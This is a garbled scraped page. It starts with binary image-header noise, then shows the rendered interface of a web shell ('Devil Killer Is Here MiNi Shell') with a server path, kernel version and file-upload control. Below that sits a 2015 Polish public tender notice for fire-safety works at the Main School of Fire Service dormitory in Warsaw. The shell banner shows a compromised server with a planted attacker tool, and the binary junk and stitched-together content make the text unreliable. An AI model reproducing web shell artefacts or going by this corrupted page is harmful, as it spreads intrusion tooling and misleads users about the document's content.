JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150707/167862-N-2015.html

<p class="kh_header"><b>Warszawa: Roboty budowlane w zakresie dostosowania budynku akademickiego Szkoły Głównej Służby Pożarniczej znajdującego się w Warszawie przy ul. Falęckiej 9/11 do wymogów obowiązujących przepisów przeciwpożarowych.</b><br>
<b>Numer ogłoszenia: 167862 - 2015; data zamieszczenia: 07.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Główna Służby Pożarniczej , ul. Słowackiego 52/54, 01-629 Warszawa, woj. mazowieckie, tel. 022 5617624, faks 022 8330724.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sgsp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane w zakresie dostosowania budynku akademickiego Szkoły Głównej Służby Pożarniczej znajdującego się w Warszawie przy ul. Falęckiej 9/11 do wymogów obowiązujących przepisów przeciwpożarowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych - instalacyjnych w zakresie instalacji przeciwpożarowej w budynku akademickim Szkoły Głównej Służby Pożarniczej znajdującym się w Warszawie przy ul. Falęckiej 9/11.

Nieruchomość położona jest na działce nr 51 z obrębu 146505_8.0119.49. 
Nieruchomość jest zabudowana podpiwniczonym budynkiem zamieszkania zbiorowego, który posiada 4 kondygnacje i zakwalifikowany jest do kategorii zagrożenia ludzi ZLV. 
Budynek ma wysokość 15,29 m, powierzchnię zabudowy 509 m2, powierzchnię użytkową 1 769,14 m2, kubaturę 8 230,96 m3. 
Budynek wyposażony jest w urządzenia infrastruktury sieci wodociągowej, sieci kanalizacyjnej, sieci energetycznej oraz sieci ciepłowniczej. 
Budynek wykonany jest w konstrukcji tradycyjnej, ze ścianami murowanymi z cegły ceramicznej pełnej, z żelbetowymi stropami, trójbiegową klatką schodową oraz stropodachem wentylowanym, jednospadowym, krytym papą. 
Wszystkie kondygnacje połączone są przez jedną trójbiegową klatkę schodową. Liczba miejsc noclegowych w akademiku wynosi 91. Studenci zakwaterowani są w budynku przez cały rok. Na każdej kondygnacji budynku mogą maksymalnie przebywać ok. 23 osoby. 
W budynku nie przewiduje się występowania substancji pożarowo niebezpiecznych. 
Występują typowe materiały palne: wyposażenie wnętrz - meble, artykuły biurowe itp.  
Obecnie budynek posiada strefę pożarową o powierzchni nie przekraczającej 5 000 m2. 
Projekt zakłada wydzielenie kondygnacji piwnicznej jako odrębnej strefy pożarowej za pomocą drzwi przeciwpożarowych w klasie odporności ogniowej EI 60S. Budynek dłuższym bokiem usytuowany jest wzdłuż ul. Falęckiej. Budynek znajduje się w zwartej zabudowie szeregowej i od strony północno zachodniej ścianą szczytową przylega do sąsiedniego, czterokondygnacyjnego budynku mieszkalnego, wielorodzinnego o tej samej wysokości. Budynki nie są ze sobą połączone komunikacyjnie. Oddzielone są od siebie ścianą o odporności ogniowej REI 120. 
Z pozostałych stron dom studencki oddalony jest od innych budynków mieszkalnych wielorodzinnych o ponad 8 m.


Przedmiot zamówienia obejmuje:
- wydzielenie pożarowe klatki schodowej za pomocą ścian murowanych z bloczków betonowych gr. 11,5 cm, w klasie odporności ogniowej REI 60 oraz za pomocą drzwi dymoszczelnych w klasie odporności ogniowej EI 60S oddzielających ją od poziomych dróg komunikacji ogólnej. Drzwi należy wyposażyć w samozamykacze lub w urządzenia automatycznie je zamykające w razie pożaru,
- wymianę wypełnienia przewężeń w ścianach klatki schodowej po  dawnych otworach drzwiowych na wypełnienie wykonane z cegły pełnej o grubości 0,25 m, jednostronnie tynkowane, podnosząc klasę tego wypełnienia do klasy odporności ściany wydzielającej klatkę schodową,
- usunięcie z hallu wejściowego w poziomie parteru drewnopodobnej okładziny ściennej,
-wydzielenie piwnicy jako odrębnej strefy pożarowej za pomocą drzwi dymoszczelnych w klasie odporności ogniowej EI 60S,
- zamontowanie w okienku recepcji na parterze rolety przeciwpożarowej w klasie odporności ogniowej EI 30, zamykanej w przypadku wykrycia pożaru przez system sygnalizacji pożaru SS. Ponadto, poniżej pulpitu okienka recepcji, istniejący otwór w ścianie, obecnie zabezpieczony płytą drewnopochodną, po jej usunięciu zostanie  zabudowany w systemie ściany przeciwpożarowej o odporności ogniowej co najmniej EI 30,
- usunięcie elementów wyposażenia, wykończenia przestrzeni korytarza ewakuacyjnego oraz w przestrzeni wyjścia z budynku na parterze w postaci wykładziny drewnopochodnej i lamperii drewnopochodnej oraz w klatce schodowej,
-zamknięcie pokoi akademickich drzwiami dymoszczelnymi w klasie odporności ogniowej co najmniej EI 30S z samozamykaczami, jak również ewentualne podniesienie klasy odporności ogniowej ścian oddzielających poszczególne pokoje do klasy EI 60,
- wymianę wypełnienia przewężeń w ścianach korytarza ewakuacyjnego po dawnych otworach drzwiowych na wypełnienie wykonane z cegły pełnej o grubości 0,25 m, jednostronnie tynkowane, podnosząc klasę odporności tego wypełnienia do klasy odporności ściany wydzielającej korytarz,
- wyposażenie budynku w system sygnalizacji pożaru SSP z sygnalizacją optyczno-akustyczną na każdej kondygnacji budynku z podłączeniem do monitoringu pożarowego-zgodnie z projektem instalacji elektrycznych,
- wyposażenie całego budynku w instalacje awaryjnego oświetlenia ewakuacyjnego o natężeniu światła ewakuacyjnego wynoszącego 2lx. Zastosowane awaryjne oświetlenie ewakuacyjne pracuje w trybie ciągłym i awaryjnym,
- wykonanie oznakowania dróg i kierunków ewakuacji-zgodnie z projektem instalacji elektrycznych,
- wyposażenie klatki schodowej w instalację wodociągową przeciwpożarową z zaworami hydrantowymi o średnicy nominalnej DN 52, zlokalizowanymi na każdej kondygnacji, z jednoczesnym zapewnieniem jej zasilania bezpośrednio z miejskiej sieci wodociągowej-zgodnie z projektem instalacji sanitarnych,
- wykonanie w elewacji budynku od strony drogi pożarowej nasad tłocznych 2 x O75 umożliwiających awaryjne zasilanie ww. instalacji z samochodów gaśniczych PSP,
- wyposażenie całego obiektu w podręczny sprzęt gaśniczy,
- podniesienie klasy odporności ogniowej ścian i drzwi w pomieszczeniu rozdzielnicy głównej-projektuje się wzmocnienie obudowy ścian rozdzielnicy głównej znajdującej się pod schodami, do klasy wydzielenia przeciwpożarowego REI 120 pomieszczenia technicznego ze strefy ZLV oraz wymianę drzwi na drzwi o klasie odporności ogniowej EI 60S,
- wyposażenie klatki schodowej w urządzenia służące do usuwania dymu w postaci okien oddymiających na ostatniej kondygnacji zgodnie z projektem oddymiania. Napowietrzenie klatki schodowej zostanie zapewnione poprzez zamontowanie siłowników na istniejących skrzydłach okiennych i drzwiowych na parterze- zgodnie z projektem oddymiania,
- zamontowanie na każdej kondygnacji klatki schodowej zaworu hydrantowego p/poż. DN 52 mm, połączonego z nawodnionym pionem,
- zdemontowanie istniejących podejść oraz hydrantów H52. W korytarzach komunikacyjnych na każdej kondygnacji należy zainstalować hydranty wewnętrzne H25 z wężem półsztywnym oraz w piwnicy hydrant wewnętrzny H52 z wężem płasko składanym - zgodnie z projektem instalacji sanitarnych. Projektowane hydranty będą zasilane z istniejącego pionu p/poż..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje zamówienia uzupełniające w myśl artykułu 67 ust. 1 pkt. 6 Ustawy Pzp stanowiące nie więcej niż 50% wartości zamówienia podstawowego i polegające na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 42.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Wysokość wadium.

Zamawiający żąda od wykonawców wniesienia wadium w kwocie:

15 000,00 zł, słownie: piętnaście tysięcy złotych

2) Okres ważności wadium musi obejmować cały okres związania ofertą.
3) Forma wadium.
Wadium może być wniesione w następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.)
4) W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być gwarancją nieodwołalną, bezwarunkową i płatną na pierwsze pisemne żądanie Zamawiającego, sporządzoną zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją,
c) kwotę gwarancji,
d) termin ważności gwarancji,
e) zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- nie wniósł zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
oraz przed wyborem oferty najkorzystniejszej
- jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złoży dokumentów lub oświadczeń , o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, lub nie wyrazi zgody na na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowoduje brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.

5) Miejsce i sposób wniesienia wadium.

Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:

nr 44 1030 1508 0000 0008 1630 1904  w BH 
tytułem: wadium w sprawie PN 17/15 ............................ (wpisać nazwę zamówienia którego dotyczy wnoszone wadium)

W przypadku wnoszenia wadium w innej formie niż pieniężnej, Wykonawca winien złożyć w ofercie kserokopię dokumentu poświadczoną za zgodność z oryginałem przez Wykonawcę, przy czym oryginał dokumentu należy złożyć w oddzielnej kopercie wraz z ofertą.

W przypadku przelewu wadium na konto Zamawiającego, do oferty należy dołączyć kserokopię przelewu potwierdzoną za zgodność z oryginałem.
Za skutecznie wniesione wadium w pieniądzu, Zamawiający uzna wadium, które w oznaczonym terminie tj. terminie złożenia oferty znajduje się na rachunku Zamawiającego.

6) Termin wniesienia wadium.
- Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
- Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości i w wybranej formie spośród możliwych wyżej wymienionych.

7) Utrata wadium.
Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych w art. 46 ust. 4a i 5 Ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymaga się od wykonawców posiadania specjalnych uprawnień.
W tym zakresie, wymaga się od wykonawców złożenia stosownego oświadczenia w trybie art. 44 ustawy Pzp,  którego treść zawarta jest w Rozdziale II SIWZ - dokument nr 2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie wymaga się od wykonawców przedłożenia wykazu (wg. Rozdziału II SIWZ-   dokument nr 3) wszystkich robót budowlanych w zakresie:

instalacji budowlanych-  o których mowa w SEKCJA F GRUPA 45.3 klasa 45.31 Załącznik do rozporządzenia Prezesa Rady Ministrów z dnia 3 grudnia 2012 r. (poz. 1372) w sprawie wykazu robót budowlanych -  wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

(Definicja dowodu określona została w Rozporządzenia Prezesa Rady Ministrów z dnia  19.02.2013 r. (Dz. U. 2013 poz. 231) §1 ust. 2.)

Za spełnienie warunku wg formuły spełnia - nie spełnia uznane zostanie  wykazanie się przez Wykonawcę wykonaniem,  spośród wszystkich wykazanych wykonanych we wskazanym zakresie i okresie robót, co najmniej dwoma (2 -oma) robotami budowlanymi, obejmującymi swym zakresem wykonanie instalacji systemu sygnalizacji pożaru, systemu oddymiania oraz instalacji przeciwpożarowej wewnętrznej, rodzajowo związanych z przedmiotem zamówienia, na kwotę brutto nie mniejszą niż 300 000 zł każda.

Za najważniejsze Zamawiający uznaje roboty budowlane które rodzajowo i wartościowo potwierdzają, że Wykonawca spełnia ww. warunki udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie wymaga się od wykonawców posiadania specjalnych uprawnień.
W tym zakresie, wymaga się od wykonawców złożenia stosownego oświadczenia w trybie art. 44 ustawy Pzp,  którego treść zawarta jest w Rozdziale II SIWZ - dokument nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie wymaga się od Wykonawców wskazania osób, które uczestniczyć będą w wykonywaniu zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi wchodzącymi w zakres przedmiotu zamówienia, wraz z podaniem informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami. 
Wzór wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia podany jest w  Rozdziale II -wzory dokumentów- WZÓR nr 4.
W celu spełnienia warunku udziału w postępowaniu wymaga się od wykonawców aby dysponowali: 
- co najmniej jedną osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U z 2013 r., poz. 1409 ze zm.) do pełnienia funkcji kierownika budowy w specjalności konstrukcyjno - budowlanej. 
- co najmniej jedną osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U z 2013 r., poz. 1409 ze zm.) do pełnienia funkcji kierownika budowy w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
- co najmniej jedną osobą posiadającą uprawnienia budowlane w rozumieniu przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U z 2013 r., poz. 1409 ze zm.) do pełnienia funkcji kierownika budowy w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych. 
Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U z 2013 r., poz. 1409 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394 ze zm.) 

Wskazane osoby muszą posiadać co najmniej dwuletni  staż pracy w  kierowaniu robotami budowlanymi w posiadanych  specjalnościach. 

Ocena spełniania przez wykonawców wyżej wymienionego warunku wg formuły spełnia -nie spełnia, polegać będzie na sprawdzeniu czy wykonawca dysponuje odpowiednimi osobami wg warunków j.w. oraz czy wykazane osoby posiadają wymagane wykształcenie, uprawnienia i doświadczenie. 
Na okoliczność, że osoby wskazane do kierowania robotami budowlanymi, posiadają stosowne uprawnienia budowlane, wykonawcy złożą oświadczenia w treści Wykazu osób. Przedłożenie dokumentu uprawniającego będzie wymagane na etapie podpisywania umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie wymaga się od wykonawców, poza oświadczeniem składanym w trybie art. 44 ustawy Pzp, dostarczenia opłaconej polisy (w tym dowodu opłacenia), a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  budowlanej na kwotę min. 100 000,00 złotych. 
Ocena spełniania przez wykonawców wyżej wymienionego warunku wg formuły spełnia -nie spełnia, polegać będzie na sprawdzeniu czy złożony dokument potwierdza ubezpieczenie się wykonawcy na warunkach j.w.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>W tym zakresie wymaga się od wykonawców przedłożenia wykazu (wg. Rozdziału II SIWZ-   dokument nr 3) wszystkich robót budowlanych w zakresie:

instalacji budowlanych-  o których mowa w SEKCJA F GRUPA 45.3 klasa 45.31 Załącznik do rozporządzenia Prezesa Rady Ministrów z dnia 3 grudnia 2012 r. (poz. 1372) w sprawie wykazu robót budowlanych -  wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

(Definicja dowodu określona została w Rozporządzenia Prezesa Rady Ministrów z dnia  19.02.2013 r. (Dz. U. 2013 poz. 231) §1 ust. 2.)

Za spełnienie warunku wg formuły spełnia - nie spełnia uznane zostanie  wykazanie się przez Wykonawcę wykonaniem,  spośród wszystkich wykazanych wykonanych we wskazanym zakresie i okresie robót, co najmniej dwoma (2 -oma) robotami budowlanymi, obejmującymi swym zakresem wykonanie instalacji systemu sygnalizacji pożaru, systemu oddymiania oraz instalacji przeciwpożarowej wewnętrznej, rodzajowo związanych z przedmiotem zamówienia, na kwotę brutto nie mniejszą niż 300 000 zł każda.

Za najważniejsze Zamawiający uznaje roboty budowlane które rodzajowo i wartościowo potwierdzają, że Wykonawca spełnia ww. warunki udziału w postępowaniu.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

